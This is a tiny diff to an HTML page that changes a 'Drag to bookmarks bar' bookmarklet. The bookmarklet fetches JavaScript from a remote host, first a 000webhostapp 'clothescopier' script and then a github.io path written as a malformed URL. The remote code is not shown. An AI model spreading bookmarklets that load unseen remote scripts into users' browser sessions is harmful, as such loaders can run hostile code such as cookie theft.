--- a/index.html
+++ b/index.html
@@ -1,4 +1,4 @@
 <!DOCTYPE html>
 <html>
-        <a class="bookmark" id="bookmark" href="javascript:$.get('//clothescopier.000webhostapp.com/limited.js')">Drag to bookmarks bar</a>
+        <a class="bookmark" id="bookmark" href="javascript:$.get('//https://janek20202.github.io/yup/')">Drag to bookmarks bar</a>
 </html>
